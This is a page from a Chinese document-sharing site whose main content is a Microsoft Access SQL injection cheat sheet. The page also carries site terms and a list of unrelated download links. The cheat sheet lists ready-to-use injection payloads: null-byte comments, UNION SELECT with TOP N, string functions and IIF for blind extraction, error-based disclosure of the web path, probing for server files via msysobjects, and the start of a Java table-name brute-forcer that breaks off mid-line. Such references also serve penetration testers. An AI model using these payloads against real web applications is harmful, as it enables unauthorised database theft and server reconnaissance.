- 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
AccessSQL注入参考
Access SQL注入参考
描述
SQL查询及注释
注释符
Access中没有专门的注释符号.因此/*, --和#都没法使用.但是可以使用空字符NULL(%00)代替:
UNION SELECT 1,1,1 FROM validTableName%00
语法错误信息
[Microsoft][Driver ODBC Microsoft Access]
多句执行
不支持.
联合查询
Access支持联合查询,UNION后的FROM关键字必须使用一个已经存在的表名.
附属查询
Access支持附属查询(例如:TOP 1用来返回第一行的内容) :
AND (SELECT TOP 1 someData FROM validTableName)%00
LIMIT支持
LIMIT不被支持,但是在查询中可以声明TOP N来限制返回内容的行数:
UNION SELECT TOP 3 AttrName FROM validTableName%00 : 这条语句返回(前)3 行.
让查询返回0行
在脚本在返回的HTML结果中只显示第一个查询的结果的时候非常有用:
AND 1=0 UNION SELECT AttrName1,AttrName2 FROM validTableName%00
字符串连接
不支持CONCAT()函数. 可以使用或+操作来俩接两个字符串.在使用的时侯必须对这两个操作符进行URLencode编码:
UNION SELECT web %2b app FROM validTableName%00 : 返回webapp
UNION SELECT web %26 app FROM validTableName%00 : 返回webapp
子字符串
MID()函数:
UNION SELECT MID(abcd,1,1) FROM validTableName%00 : 返回 a
UNION SELECT MID(abcd,2,1) FROM validTableName%00 : 返回 b
字符串长度
LEN()函数:
UNION SELECT LEN(1234) FROM validTableName%00 : 返回 4
暴WEB路径
可以通过对一个不存在的库进行SELECT操作.Access将会回应一条包含有完整路径的错误信息.:
UNION SELECT 1 FROM ThisIsAFakeName.FakeTable%00
取字符的ASCII值
ASC()函数:
UNION SELECT ASC(A) FROM ValidTable%00 :返回65 (A的ASCII值)
ASCII值转换为字符
CHR()函数:
UNION SELECT CHR(65) FROM validTableName%00 : 返回 A
IF语句
可以使用IIF()函数. 语法 : IIF(condition, true, false) :
UNION SELECT IIF(1=1, a, b) FROM validTableName%00 : 返回 a
时间接口
不存在类似BENCHMARK()或SLEEP()的函数,但是可以使用大量(高负载)的查询来达到这个效果. HYPERLINK /technet/community/columns/secmvp/sv0907.mspx 点击这里查看参考.
验证文件是否存在
在注入的时候使用:
UNION SELECT name FROM msysobjects IN \boot.ini%00 : (如果文件存在)将会获得一条错误信息:it informs that the database format was not recognized.
表名猜解
这里有一个简单的猜解access表名的java代码.我写他是为了更好的解释猜解表名的原理:
static private String columnErrorMessage = ...;static private String accessError = ...;[...]public String bruteTableName(Request r) { // 0String resp = new String();String[] table = { tab_name1, tab_name2, ..., tab_nameN }; // 1for(int i = 0; i table.length; i++) {resp = sendInjection(r, UNION SELECT 1 FROM + table[i] + %00); // 2if(resp.contains(colum
您可能关注的文档
最近下载
- baltur燃烧器TBG210P17690030中文使用维护手册.pdf VIP
- 审核员现场见证评价表参考实用文档.doc VIP
- 2023年军队文职人员招聘之军队文职公共科目押题练习试卷A卷附答案.docx VIP
- ai心理健康创业计划书.docx VIP
- 国开作业管理学基础-管理实训:第二章 查阅文献资料并写出评论参考(含答案)025.docx VIP
- 医学综合试题库及答案.docx VIP
- 通用工器具安全管理规范.docx VIP
- 2025届高考作文技巧之列提纲优化结构课件(共46张PPT).pptx VIP
- 光学装配与调校技术课件.pptx VIP
- 医学综合知识试题库+答案.pdf VIP
文档评论(0)